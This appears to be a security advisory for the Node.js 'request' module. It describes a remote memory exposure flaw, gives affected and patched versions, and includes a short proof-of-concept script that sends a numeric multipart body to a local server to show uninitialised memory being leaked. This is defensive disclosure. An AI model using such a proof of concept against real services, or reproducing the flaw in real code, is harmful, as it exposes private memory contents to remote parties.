Remote Memory Exposure

Module: request

Published: April 14th, 2017

Reported by: Feross Aboukhadijeh

CVE-NONE

CWE-201

Vulnerable: >=2.2.6 <2.47.0 || >2.51.0 <=2.67.0
Patched: >=2.68.0

Overview

Affected versions of request will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of body is number, then a buffer of that size will be allocated and sent to the remote server as the body.

Proof of Concept

var request = require('request');
var http = require('http');

var serveFunction = function (req, res){
    req.on('data', function (data) {
            console.log(data)
        });
    res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

request({
    method: "POST",
    uri: 'http://localhost:8000',
    multipart: [{body:500}]
},function(err,res,body){});

Remediation

Update to version 2.68.0 or later

References

PR #2018 Issue #1904